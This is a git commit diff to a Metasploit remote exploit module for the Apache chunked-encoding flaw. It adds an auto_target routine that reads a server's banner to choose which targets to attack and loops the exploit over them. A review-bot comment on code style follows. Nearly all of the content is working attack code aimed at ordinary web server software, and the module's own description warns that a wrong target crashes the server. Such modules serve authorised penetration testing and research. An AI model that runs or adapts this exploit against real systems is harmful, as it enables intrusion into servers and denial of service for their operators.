add auto_target to apache_chunked exploit - should reduce run duration in most cases
git-svn-id: file:///home/svn/framework3/trunk@8980 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
776259e3c6
commit
eb003518ce
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
|
@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
automatically restart, so if you use the wrong target value,
|
||||
the server will crash.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
@ -194,12 +192,82 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return code
|
||||
end
|
||||
|
||||
def auto_target
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
targets_to_try = []
|
||||
|
||||
if response.nil?
|
||||
print_error("No response to request")
|
||||
return targets_to_try
|
||||
end
|
||||
|
||||
server_hdr = response['Server']
|
||||
print_status("Server: #{server_hdr}")
|
||||
|
||||
case server_hdr
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
|
||||
targets_to_try.push(targets[9])
|
||||
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
|
||||
targets_to_try.push(targets[10])
|
||||
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
|
||||
targets_to_try.push(targets[11])
|
||||
|
||||
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
|
||||
# fall through
|
||||
|
||||
else
|
||||
# check for apache version ranges
|
||||
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
|
||||
version = $1
|
||||
|
||||
#print_status("Apache version: #{version}")
|
||||
ver = version.split('.')
|
||||
if (ver.length == 3)
|
||||
major = ver[0].to_i
|
||||
minor = ver[1].to_i
|
||||
rev = ver[2].to_i
|
||||
if (major == 1 and minor == 3)
|
||||
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
|
||||
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
|
||||
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
|
||||
targets_to_try.push(targets[4]) if (rev == 22)
|
||||
|
||||
# Add the remaining targets, regardless of quality...
|
||||
if (server_hdr =~ /Win32/)
|
||||
# targets 4, 5, 6, 7
|
||||
if (rev >= 17 and rev <= 24)
|
||||
targets_to_try.push(targets[5])
|
||||
targets_to_try.push(targets[6])
|
||||
end
|
||||
targets_to_try.push(targets[7])
|
||||
targets_to_try.push(targets[8])
|
||||
end
|
||||
end
|
||||
# Version 1.0 - 1.2, Fall through...
|
||||
end
|
||||
# ServerTokens setting isn't giving up enough information ... Might need to try?
|
||||
end
|
||||
# Not Apache? Fall through...
|
||||
end
|
||||
|
||||
targets_to_try
|
||||
end
|
||||
|
||||
#
|
||||
# If auto, ask the auto_target function for a list of
|
||||
# targets to try...
|
||||
#
|
||||
# If not auto, just try the selected target.
|
||||
#
|
||||
def exploit
|
||||
if target_index == 0
|
||||
targets.each_with_index { |targ, idx|
|
||||
next if idx == 0
|
||||
targs = auto_target
|
||||
print_status("Auto-targeting returned #{targs.length} candidates...")
|
||||
targs.each_with_index { |targ, idx|
|
||||
# Never try the debug target automatically :)
|
||||
next if targ.name =~ /Debug/
|
||||
|
||||
exploit_target(targ)
|
||||
}
|
||||
else
|
||||
|
@ -257,4 +325,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
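Review bot: The numeric indices in `auto_target` (`targets[1]` through `targets[11]`) tie the banner matching to the order of the module's `Targets` array, which is defined outside the visible hunks. Inserting or reordering a target would silently select a different entry, and the description text in the second hunk says a wrong target value crashes the server, so a comment above the `case` such as `# indices below must stay in sync with the order of 'Targets'` should record the coupling. The `Server` header is self-reported and can be trimmed or altered (the inline ServerTokens comment hints at this), and the version ranges overlap (revision 22 matches three entries), so a doc comment on `auto_target` should state that the returned list is a best guess and may contain several candidates that are tried in turn. In `exploit`, `idx` is unused in the new loop, so `targs.each { |targ|` is enough.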